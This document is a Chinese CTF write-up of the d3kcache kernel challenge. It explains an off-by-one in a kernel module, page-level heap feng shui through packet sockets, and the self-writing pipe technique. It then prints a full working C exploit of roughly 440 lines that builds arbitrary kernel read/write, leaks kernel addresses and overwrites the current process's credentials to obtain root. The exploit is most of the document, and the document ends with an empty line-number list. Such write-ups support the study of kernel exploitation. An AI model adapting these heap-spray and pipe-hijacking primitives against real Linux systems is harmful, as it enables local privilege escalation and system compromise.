0%

页级堆风水+自写管道

d3kcache

1
2
3
4
5
6
7
8
9
10
11
12
13
#!/bin/bash
qemu-system-x86_64 \
-m 256M \
-cpu kvm64,+smep,+smap \
-smp cores=2,threads=2 \
-kernel bzImage \
-hda ./rootfs.img \
-nographic \
-monitor /dev/null \
-snapshot \
-append "console=ttyS0 root=/dev/sda rw rdinit=/sbin/init kaslr pti=on quiet oops=panic panic=1" \
-no-reboot \
-s
  • smep,smap,kaslr,pti
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#!/bin/sh
chown -R root:root /
chmod 700 /root
chown -R ctf:ctf /home/ctf
chown root:root /root/flag
chmod 600 /root/flag

mount -t proc none /proc
mount -t sysfs none /sys
mount -t tmpfs tmpfs /tmp
mkdir /dev/pts
mount -t devpts devpts /dev/pts

echo 1 > /proc/sys/kernel/dmesg_restrict
echo 1 > /proc/sys/kernel/kptr_restrict

insmod /root/d3kcache.ko
chmod 666 /dev/d3kcache

cat /root/banner
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"

cd /home/ctf
setsid cttyhack su ctf -c /bin/sh
#setsid cttyhack setuidgid 1000 sh

poweroff -d 0 -f
  • dmesg_restrict
  • kptr_restrict
1
2
3
4
CONFIG_CFI_CLANG=y # 开启内存控制器(GFP_KERNEL和GFP_ACCOUNT之间存在隔离)
CONFIG_MEMCG=y # 开启Control-Flow Integrity控制流完整性(内核ROP失效)
CONFIG_SLAB_FREELIST_RANDOM=y # 开启slab freelist随机化
CONFIG_SLAB_FREELIST_HARDENED=y

漏洞分析

漏洞点如下:

1
2
3
4
5
if ( !copy_from_user(kdata, ptr, size) )
{
kdata[size] = 0; // 末尾置空,off-by-one
re = 0LL;
}
  • 内核 off-by-one

程序的 kmem_cache 是独立的:

1
2
3
4
5
6
7
if ( (unsigned __int64)module_device < 0xFFFFFFFFFFFFF001LL )
{
printk(&unk_A66);
spin = 0;
kcache_jar = kmem_cache_create_usercopy("kcache_jar", 2048LL, 0LL, 67379200LL, 0LL, 2048LL, 0LL);
memset(kcache_list, 0, 0x100uLL);
}
  • 只能考虑 cross-cache overflow

页级堆风水

页级堆风水即以内存页为粒度的内存排布方式,这种利用手法实际上是让我们手工构造一个新的已知的页级粒度内存页排布

从更高阶 order 拆分成的两份低阶 order 的连续内存页是物理连续的,由此我们可以:

  • 向 buddy system 请求两份连续的内存页
  • 释放其中一份内存页,在 vulnerable kmem_cache 上堆喷,让其取走这份内存页
  • 释放另一份内存页,在 victim kmem_cache 上堆喷,让其取走这份内存页

接下来利用内核模块的 off-by-one 就可能溢出到其他的内核结构体上

可以使用如下方案来构建页级堆风水:

  • 创建一个 protocol 为 PF_PACKET 的 socket
  • 调用 setsockoptPACKET_VERSION 设为 TPACKET_V1 或者 TPACKET_V2
  • 调用 setsockopt 提交一个 PACKET_TX_RING

此时便存在如下调用链:

1
__sys_setsockopt() -> sock->ops->setsockopt() -> packet_setsockopt() -> packet_set_ring() -> alloc_pg_vec()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
unsigned int block_nr = req->tp_block_nr;
struct pgv *pg_vec;
int i;

pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
if (unlikely(!pg_vec))
goto out;

for (i = 0; i < block_nr; i++) {
pg_vec[i].buffer = alloc_one_pg_vec_page(order);
if (unlikely(!pg_vec[i].buffer))
goto out_free_pgvec;
}

out:
return pg_vec;

out_free_pgvec:
free_pg_vec(pg_vec, order, block_nr);
pg_vec = NULL;
goto out;
}
  • 用以分配 tp_block_nr2^order 内存页(其中 ordertp_block_size 决定)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
static char *alloc_one_pg_vec_page(unsigned long order)
{
char *buffer;
gfp_t gfp_flags = GFP_KERNEL | __GFP_COMP |
__GFP_ZERO | __GFP_NOWARN | __GFP_NORETRY;

buffer = (char *) __get_free_pages(gfp_flags, order);
if (buffer)
return buffer;

/* __get_free_pages failed, fall back to vmalloc */
buffer = vzalloc(array_size((1 << order), PAGE_SIZE));
if (buffer)
return buffer;

/* vmalloc failed, lets dig into swap here */
gfp_flags &= ~__GFP_NORETRY;
buffer = (char *) __get_free_pages(gfp_flags, order);
if (buffer)
return buffer;

/* complete and utter failure */
return NULL;
}
  • 直接调用 __get_free_pages() 向 buddy system 请求内存页,因此可以利用该函数进行大量的页面请求

自写管道

当我们创建一个管道时,在内核中会生成16个连续的 pipe_buffer 结构体,申请的内存总大小刚好会让内核从 kmalloc-1k 中取出一个 object

1
2
3
4
5
6
7
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};
  • pipe 系统调用提供了 fcntl(F_SETPIPE_SZ) 让我们可以重新分配 pipe_buffer 并指定其数量

自写管道的核心就是劫持 pipe_buffer->page,使该 page 结构体映射 pipe_buffer 本身所在的物理页面,通过多个这样的自写管道就可以构造出一个近乎无限制的任意读写系统

内核结构体 pipe_buffer 的第一个条目为 page,覆盖其低位就可能导致 page 重叠:

  • 覆盖低位后,pipe_buffer1-1->pagepipe_buffer1-2->page 指向同一个 page

1700041832088

接下来就可以利用 UAF pipe_buffer 来泄露数据:

  • 释放 UAF pipe_buffer(4k的缓冲页也会被释放,释放之后数据不会清除仍然可读写)
  • 使用 fcntl(F_SETPIPE_SZ) 重新分配 pipe_buffer,部分的 pipe_buffer 就会被申请到之前我们释放的4k缓冲页上
  • 利用 UAF 对4k缓冲页进行读取就可以泄露地址

1700043734977

修改可控的 pipe_buffer2->page,即可完成二级 UAF:

  • 利用之前的 UAF 可以修改 pipe_buffer2-1->page,使 pipe_buffer2-1->pagepipe_buffer2-2->page 指向同一个 page,构成二级 UAF

1700044287875

用同样的方法将 pipe_buffer3 申请到4k缓冲页上,并利用二级 UAF 覆盖 pipe_buffer3->pagepipe_buffer2->page

  • 由于 pipe_buffer2->page 映射 pipe_buffer3 所在的物理页面,现在 pipe_buffer3 成为 self-writing pipe

1700045029863

接着构造另外两个 self-writing pipe,直到将3个 pipe_buffer 修改为 self-writing pipe(执行 write(pipe_list[target][1]) 可以修改 pipe_buffer 本身)

  • 这3个 self-writing pipe 在同一个页面上,并且它们的 pipe_buffer->page 都映射这个页面

之后就可以进行 RAA 和 WAA 了,这里我们使用三个管道:

  • self-writing pipe1:用以进行内存空间中的任意读写,我们通过修改其 page 指针完成
  • self-writing pipe2:用以修改 self-writing pipe3,使其写入的起始位置指向 self-writing pipe1
  • self-writing pipe3:用以修改 self-writing pipe1self-writing pipe2,使得 self-writing pipe1 的 pipe 指针指向指定位置,self-writing pipe2 的写入起始位置指向 self-writing pipe3

入侵思路

先利用 setsockopt 构建好页级堆风水

在准备阶段,分别在 socket_fd 中部署好大量 1K,2K,8K 的页面:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
void prepare_pgv_pages(void)
{
/**
* We want a more clear and continuous memory there, which require us to
* make the noise less in allocating order-3 pages.
* So we pre-allocate the pages for those noisy objects there.
*/
puts("[*] spray pgv order-0 pages...");
for (int i = 0; i < PGV_1PAGE_SPRAY_NUM; i++) {
if (alloc_page(i, 0x1000, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

puts("[*] spray pgv order-2 pages...");
for (int i = 0; i < PGV_4PAGES_SPRAY_NUM; i++) {
if (alloc_page(PGV_4PAGES_START_IDX + i, 0x1000 * 4, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

/* spray 8 pages for page-level heap fengshui */
puts("[*] spray pgv order-3 pages...");
for (int i = 0; i < PGV_8PAGES_SPRAY_NUM; i++) {
/* a socket need 1 obj: sock_inode_cache, 19 objs for 1 slub on 4 page*/
if (i % 19 == 0) {
free_page(pgv_4pages_start_idx++);
}

/* a socket need 1 dentry: dentry, 21 objs for 1 slub on 1 page */
if (i % 21 == 0) {
free_page(pgv_1page_start_idx += 2);
}

/* a pgv need 1 obj: kmalloc-8, 512 objs for 1 slub on 1 page*/
if (i % 512 == 0) {
free_page(pgv_1page_start_idx += 2);
}

if (alloc_page(PGV_8PAGES_START_IDX + i, 0x1000 * 8, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

puts("");
}
  • alloc_page 用于申请页面
  • free_page 用于释放页面

先释放高阶的页面,然后申请低阶的页面,在伙伴系统的分配下低阶页面大概率是物理连续的

利用这个方法部署连续的 pipe_buffer,然后在中间镶嵌一段内核模块申请的可控页面:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
for (int i = 0; i < PIPE_NUM/2; i++) {
/* let the pipe_buffer to be allocated on order-3 pages (kmalloc-4k) */
if (i % 8 == 0) {
free_page(pgv_8pages_start_idx++); // 8 * 4k
}

/* a pipe_buffer on 1k is for 16 pages, so 4k for 64 pages */
if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0) { // 8 * 4k
printf("[x] failed to extend %d pipe!\n", i);
return -1;
}
}

free_page(pgv_8pages_start_idx++); // 8 * 4k
for (int i = 0; i < 0x10; i++) { // 16 * 2k
add(i, 8, "11111111");
}

for (int i = PIPE_NUM/2; i < PIPE_NUM; i++) {
/* let the pipe_buffer to be allocated on order-3 pages (kmalloc-4k) */
if (i % 8 == 0) {
free_page(pgv_8pages_start_idx++);
}

/* a pipe_buffer on 1k is for 16 pages, so 4k for 64 pages */
if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0) { // 8 * 4k
printf("[x] failed to extend %d pipe!\n", i);
return -1;
}
}

触发 off-by-one,大概率会触发 cross-cache overflow 进而覆盖 pipe_buffer->page 的低位

此时两个 pipe_buffer->page 指向同一个 page,可以利用上述方法构造3个自写管道(详情见之前的博客)

构造完成后,调试信息如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
00:00000xffff888007267000 —▸ 0xffffea00001c9180 ◂— 0xfffffc0000000 
01:00080xffff888007267008 ◂— 0x24 /* '$' */
02:00100xffff888007267010 ◂— 0x0
03:00180xffff888007267018 ◂— 0x10
04:00200xffff888007267020 ◂— 0x0
... ↓ 3 skipped
08:00400xffff888007267040 ◂— 0x0
... ↓ 7 skipped
10:00800xffff888007267080 ◂— 0x0
... ↓ 7 skipped
18:00c0│ 0xffff8880072670c0 —▸ 0xffffea00001c99c0 ◂— 0xfffffc0000200 /* self-writing pipe1 */
19:00c8│ 0xffff8880072670c8 ◂— 0xb8000000c8
1a:00d0│ 0xffff8880072670d0 —▸ 0xffffffff82451b30 ◂— 0x0
1b:00d8│ 0xffff8880072670d8 ◂— 0x10
1c:00e00xffff8880072670e0 ◂— 0x0
1d:00e80xffff8880072670e8 ◂— 0x6e6e6e6e6e6e6e6e ('nnnnnnnn')
... ↓ 2 skipped
20:01000xffff888007267100 ◂— 0x6e6e6e6e6e6e6e6e ('nnnnnnnn')
... ↓ 7 skipped
28:01400xffff888007267140 ◂— 0x6e6e6e6e6e6e6e6e ('nnnnnnnn')
... ↓ 7 skipped
30:01800xffff888007267180 —▸ 0xffffea00001c99c0 ◂— 0xfffffc0000200 /* self-writing pipe2 */
31:01880xffff888007267188 ◂— 0x240
32:01900xffff888007267190 —▸ 0xffffffff82451b30 ◂— 0x0
33:01980xffff888007267198 ◂— 0x10
34:01a0│ 0xffff8880072671a0 ◂— 0x0
35:01a8│ 0xffff8880072671a8 ◂— 0x6d6d6d6d6d6d6d6d ('mmmmmmmm')
... ↓ 2 skipped
38:01c0│ 0xffff8880072671c0 ◂— 0x6d6d6d6d6d6d6d6d ('mmmmmmmm')
... ↓ 7 skipped
40:02000xffff888007267200 ◂— 0x6d6d6d6d6d6d6d6d ('mmmmmmmm')
... ↓ 7 skipped
48:02400xffff888007267240 —▸ 0xffffea00001c99c0 ◂— 0xfffffc0000200 /* self-writing pipe3 */
49:02480xffff888007267248 ◂— 0xe0000000c8
4a:02500xffff888007267250 —▸ 0xffffffff82451b30 ◂— 0x0
  • self-writing pipe1:偏移为 0xc0
  • self-writing pipe2:偏移为 0x180
  • self-writing pipe3:偏移为 0x240

构造好 RAA 与 WAA 原语后,便可以从后往前扫描内存,同时泄露 vmemmap_basekernel_base

进行任意读写之前,都需要先将物理地址转化为对应 paga 结构体的地址,转换函数如下:

1
2
3
4
5
6
7
8
size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{
size_t page_count;

page_count = ((direct_map_addr & (~0xfff)) - page_offset_base) / 0x1000;

return vmemmap_base + page_count * 0x40;
}

从前往后扫描内存,查找并尝试覆盖 current_task->credinit_cred

  • 调试时可以通过解引用 task_struct->parent(offset=309*8) 的方式向上一直找到 init 进程(init->parent 指向自身,利用这一点可以定位 init 进程)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <string.h>
#include <sys/prctl.h>

#include "kernelpwn.h"

#define PIPE_NUM 200
#define SND_PIPE_BUF_SZ 96
#define TRD_PIPE_BUF_SZ 192

int self_4th_pipe_idx = -1;
int self_2nd_pipe_idx = -1;
int self_3rd_pipe_idx = -1;
struct pipe_buffer evil_2nd_buf, evil_3rd_buf, evil_4th_buf;
char temp_zero_buf[0x1000] = {'\0'};

int pipe_list[PIPE_NUM][2];

int fd;
struct argg {
int index;
int size;
char* data;
};

int add(int index,int size,char *data){
struct argg arg = {.size = size,.index = index,.data = data};
return ioctl(fd, 0x114, &arg);
}

int dele(int index){
struct argg arg = {.index = index};
return ioctl(fd, 0x810, &arg);
}

int kwrite(int index,int size,char *data){
struct argg arg = {.size = size,.index = index,.data = data};
return ioctl(fd, 0x514, &arg);
}

int kread(int index,int size,char *data){
struct argg arg = {.size = size,.index = index,.data = data};
return ioctl(fd, 0x1919, &arg);
}

void arbitrary_read_by_pipe(struct page *page_to_read, void *dst)
{
evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0x1ff8;
evil_2nd_buf.page = page_to_read;

write(pipe_list[self_3rd_pipe_idx][1], &evil_4th_buf, sizeof(evil_4th_buf));

write(pipe_list[self_4th_pipe_idx][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
write(pipe_list[self_4th_pipe_idx][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));

write(pipe_list[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

read(pipe_list[self_2nd_pipe_idx][0], dst, 0xfff);
}

void arbitrary_write_by_pipe(struct page *page_to_write, void *src, size_t len)
{
evil_2nd_buf.page = page_to_write;
evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0;

write(pipe_list[self_3rd_pipe_idx][1], &evil_4th_buf, sizeof(evil_4th_buf));

write(pipe_list[self_4th_pipe_idx][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
write(pipe_list[self_4th_pipe_idx][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));

write(pipe_list[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

write(pipe_list[self_2nd_pipe_idx][1], src, len);
}

int main(int argc , char **argv, char **envp){
char buf[0x1000]= {'\0'};
save_status();
bind_core(0);
unshare_setup();

fd = open("/dev/d3kcache", O_RDWR);
if (fd < 0)
err_exit("open /dev/d3kcache");

prepare_pgv_system();
prepare_pgv_pages();

for(int i = 0; i < PIPE_NUM; i++){
if(pipe(pipe_list[i]) == -1){
err_exit("pipe");
}
}

for (int i = 0; i < PIPE_NUM/2; i++) {
/* let the pipe_buffer to be allocated on order-3 pages (kmalloc-4k) */
if (i % 8 == 0) {
free_page(pgv_8pages_start_idx++); // 8 * 4k
}

/* a pipe_buffer on 1k is for 16 pages, so 4k for 64 pages */
if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0) { // 8 * 4k
printf("[x] failed to extend %d pipe!\n", i);
return -1;
}
}

free_page(pgv_8pages_start_idx++); // 8 * 4k
for (int i = 0; i < 0x10; i++) { // 16 * 2k
add(i, 8, "11111111");
}

for (int i = PIPE_NUM/2; i < PIPE_NUM; i++) {
/* let the pipe_buffer to be allocated on order-3 pages (kmalloc-4k) */
if (i % 8 == 0) {
free_page(pgv_8pages_start_idx++);
}

/* a pipe_buffer on 1k is for 16 pages, so 4k for 64 pages */
if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0) { // 8 * 4k
printf("[x] failed to extend %d pipe!\n", i);
return -1;
}
}

for (int i = 0; i < PIPE_NUM; i++){
write(pipe_list[i][1], "AAAAAAAA", 8); // tag
write(pipe_list[i][1], &i, sizeof(int));
write(pipe_list[i][1], &i, sizeof(int));
write(pipe_list[i][1], &i, sizeof(int));
write(pipe_list[i][1], "AAAAAAAA", 8);
write(pipe_list[i][1], "BBBBBBBB", 8);
}

memset(buf, 0, sizeof(buf));
for (int i = 0; i < 0x10; i++) {
kwrite(i, 0x2048 - 8, buf);
}

int victim_idx = -1;
int orig_idx = -1;
for (int i = 0; i < PIPE_NUM; i++){
char tag[0x10];
int nr;
memset(tag, 0, sizeof(tag));
read(pipe_list[i][0], tag, 8);
read(pipe_list[i][0], &nr, sizeof(int));
if (!strcmp(tag, "AAAAAAAA") && nr != i){
orig_idx = nr;
victim_idx = i;
printf("\033[32m\033[1m[+] Found index-%d and index-%d point the same page \033[0m\n",victim_idx, orig_idx);
}
}
if (orig_idx == -1 || victim_idx == -1){
err_exit("can't find");
}

struct pipe_buffer info_pipe_buf;
size_t snd_pipe_sz = 0x1000 * (SND_PIPE_BUF_SZ / sizeof(struct pipe_buffer));

memset(buf,'p',sizeof(buf));
write(pipe_list[victim_idx][1], buf, SND_PIPE_BUF_SZ * 2 - 24 - 3 * sizeof(int));
close(pipe_list[orig_idx][0]); /* 释放其中一个pipe_buffer */
close(pipe_list[orig_idx][1]);

//sleep(2);

puts("write down");

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx){
continue;
}
if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, snd_pipe_sz) < 0){
/* 2 * pipe_buffer = 0x60 kmalloc-96 */
err_exit("Fcntl Pipe");
}
}

memset(buf,0,sizeof(buf));
read(pipe_list[victim_idx][0], buf, SND_PIPE_BUF_SZ - 8 - sizeof(int));
print_hex(buf,SND_PIPE_BUF_SZ - 8);
read(pipe_list[victim_idx][0], &info_pipe_buf, sizeof(info_pipe_buf));
print_hex((char*)&info_pipe_buf,sizeof(info_pipe_buf));

printf("\033[34m\033[1m[?] info_pipe_buf->page: \033[0m%p\n"
"\033[34m\033[1m[?] info_pipe_buf->ops: \033[0m%p\n",
info_pipe_buf.page, info_pipe_buf.ops);

info_pipe_buf.page = (struct page *)((size_t)info_pipe_buf.page + 0x40);
write(pipe_list[victim_idx][1], &info_pipe_buf, sizeof(info_pipe_buf));
puts("change pipe_buffer down");

//sleep(2);

int snd_orig_idx = -1;
int snd_victim_idx = -1;
for (int i = 0; i < PIPE_NUM; i++){ /* 第二次堆喷 */
int nr;
if (i == orig_idx || i == victim_idx){
continue;
}
read(pipe_list[i][0], &nr, sizeof(int));
if (i < PIPE_NUM && i != nr){
snd_orig_idx = nr;
snd_victim_idx = i;
printf("\033[32m\033[1m[+] Found index-%d and index-%d point the same page \033[0m\n",snd_victim_idx, snd_orig_idx);
}
}

if (snd_orig_idx == -1 || snd_victim_idx == -1){
err_exit("can't find");
}

size_t trd_pipe_sz = 0x1000 * (TRD_PIPE_BUF_SZ / sizeof(struct pipe_buffer));
struct pipe_buffer evil_pipe_buf;
struct page *page_ptr;

memset(buf,'k',sizeof(buf));
write(pipe_list[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - 24 - 3 * sizeof(int));
close(pipe_list[snd_orig_idx][0]);
close(pipe_list[snd_orig_idx][1]);

puts("write down");
//sleep(2);

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx){
continue;
}

if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, trd_pipe_sz) < 0){
/* 4 * pipe_buffer = 0xc0 kmalloc-192 */
err_exit("Fcntl Pipe");
}
}

puts("fcntl down");
//sleep(2);

evil_pipe_buf.page = info_pipe_buf.page;
evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;
evil_pipe_buf.ops = info_pipe_buf.ops;
evil_pipe_buf.flags = info_pipe_buf.flags;
evil_pipe_buf.private = info_pipe_buf.private;

write(pipe_list[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));
puts("change pipe_buffer down");
//sleep(2);

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx){
continue;
}

read(pipe_list[i][0], &page_ptr, sizeof(page_ptr));
printf("%p\n",page_ptr);
if (page_ptr == evil_pipe_buf.page){
self_2nd_pipe_idx = i;
printf("\033[32m\033[1m[+] Found self-writing pipe:\033[0m%d\n",
self_2nd_pipe_idx);
break;
}
}

evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

memset(buf,'n',sizeof(buf));
write(pipe_list[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - sizeof(evil_pipe_buf));
//sleep(2);
write(pipe_list[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

puts("change pipe_buffer down");
//sleep(2);

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx || i == self_2nd_pipe_idx){
continue;
}

read(pipe_list[i][0], &page_ptr, sizeof(page_ptr));
printf("%p\n",page_ptr);
if (page_ptr == evil_pipe_buf.page){
self_3rd_pipe_idx = i;
printf("\033[32m\033[1m[+] Found self-writing pipe:\033[0m"
"%d\n",
self_3rd_pipe_idx);
break;
}
}

evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

memset(buf,'m',sizeof(buf));
write(pipe_list[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - sizeof(evil_pipe_buf));
//sleep(2);
write(pipe_list[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

puts("change pipe_buffer down");
//sleep(2);

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx || i == self_2nd_pipe_idx || i == self_3rd_pipe_idx){
continue;
}

read(pipe_list[i][0], &page_ptr, sizeof(page_ptr));
printf("%p\n",page_ptr);
if (page_ptr == evil_pipe_buf.page){
self_4th_pipe_idx = i;
printf("\033[32m\033[1m[+] Found self-writing pipe:\033[0m"
"%d\n",
self_4th_pipe_idx);
break;
}
}

memcpy(&evil_2nd_buf, &info_pipe_buf, sizeof(evil_2nd_buf));
memcpy(&evil_3rd_buf, &info_pipe_buf, sizeof(evil_3rd_buf));
memcpy(&evil_4th_buf, &info_pipe_buf, sizeof(evil_4th_buf));

evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0xff0;

evil_3rd_buf.offset = TRD_PIPE_BUF_SZ * 3;
evil_3rd_buf.len = 0;

//sleep(2);
write(pipe_list[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));
puts("change pipe_buffer down");
//sleep(2);

evil_4th_buf.offset = TRD_PIPE_BUF_SZ;
evil_4th_buf.len = 0;

vmemmap_base = (size_t)info_pipe_buf.page & 0xfffffffff0000000;
printf("vmemmap_start: 0x%lx\n",vmemmap_base);
for (;;)
{
arbitrary_read_by_pipe((struct page *)(vmemmap_base + 157 * 0x40), buf);
//printf("%lx\n",*(size_t*)buf);
if (*(uint64_t *)buf > 0xffffffff81000000 && ((*(uint64_t *)buf & 0xfff) == 0x070))
{
kernel_base = *(uint64_t *)buf - 0x070;
kernel_offset = kernel_base - 0xffffffff81000000;
printf("\033[32m\033[1m[+] Found kernel base: \033[0m0x%lx\n"
"\033[32m\033[1m[+] Kernel offset: \033[0m0x%lx\n",
kernel_base, kernel_offset);
break;
}

vmemmap_base -= 0x10000000;
}
printf("\033[32m\033[1m[+] vmemmap_base:\033[0m 0x%lx\n\n", vmemmap_base);

uint64_t parent_task, current_task;
puts("[*] Seeking task_struct in memory...");

uint64_t *comm_addr = 0;
uint64_t *point_buf = malloc(0x1000);

char target[0x20];
strcpy(target, "8888888888");
if (prctl(PR_SET_NAME, target, 0, 0, 0) != 0){
err_exit("cannot set name");
}

for (int i = 0; 1; i++)
{
arbitrary_read_by_pipe((struct page *)(vmemmap_base + i * 0x40), point_buf);

comm_addr = memmem(point_buf, 0xf00, target, strlen(target));
if (comm_addr && (comm_addr[-2] > 0xffff888000000000) /* task->cred */
&& (comm_addr[-3] > 0xffff888000000000) /* task->real_cred */
&& (comm_addr[-57] > 0xffff888000000000) /* task->read_parent */
&& (comm_addr[-56] > 0xffff888000000000)) /* task->parent */
{
parent_task = comm_addr[-57];

current_task = comm_addr[-50] - 2528;
page_offset_base = (comm_addr[-50] & 0xfffffffffffff000) - i * 0x1000;
page_offset_base &= 0xfffffffff0000000;

printf("\033[32m\033[1m[+] Found task_struct on page: \033[0m%p\n",
(struct page *)(vmemmap_base + i * 0x40));
printf("\033[32m\033[1m[+] page_offset_base: \033[0m0x%lx\n",
page_offset_base);
printf("\033[34m\033[1m[*] current task_struct's addr: \033[0m0x%lx\n",
current_task);
printf("\033[34m\033[1m[*] parent task_struct's addr: \033[0m0x%lx\n\n",
parent_task);
break;
}
}

puts("[*] Seeking for init_task...");
uint64_t *tsk_buf;
/* 调试时通过解析task_struct->parent(offset=309*8)的方式向上一直找到init进程 */
uint64_t init_task = kernel_offset + 0xffffffff8301bb80;
uint64_t init_cred = kernel_offset + 0xffffffff83079ee8; // task->cred(offset=363*8)
uint64_t init_nsproxy = kernel_offset + 0xffffffff83079b40; // task->nsproxy (offset=377*8)
//sleep(5);

printf("\033[32m\033[1m[+] Found init_task: \033[0m0x%lx\n", init_task);
printf("\033[32m\033[1m[+] Found init_cred: \033[0m0x%lx\n", init_cred);
printf("\033[32m\033[1m[+] Found init_nsproxy:\033[0m0x%lx\n", init_nsproxy);

puts("[*] Escalating ROOT privilege now...");

size_t current_task_page = direct_map_addr_to_page_addr(current_task);

arbitrary_read_by_pipe((struct page *)current_task_page, buf);
arbitrary_read_by_pipe((struct page *)(current_task_page + 0x40), &buf[512 * 8]);

tsk_buf = (size_t *)((size_t)buf + (current_task & 0xfff));
tsk_buf[363] = init_cred;
tsk_buf[364] = init_cred;
tsk_buf[377] = init_nsproxy;

arbitrary_write_by_pipe((struct page *)current_task_page, buf, 0xff0);
arbitrary_write_by_pipe((struct page *)(current_task_page + 0x40),&buf[512 * 8], 0xff0);

puts("[+] Done.\n");
puts("[*] checking for root...");

get_root_shell();
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
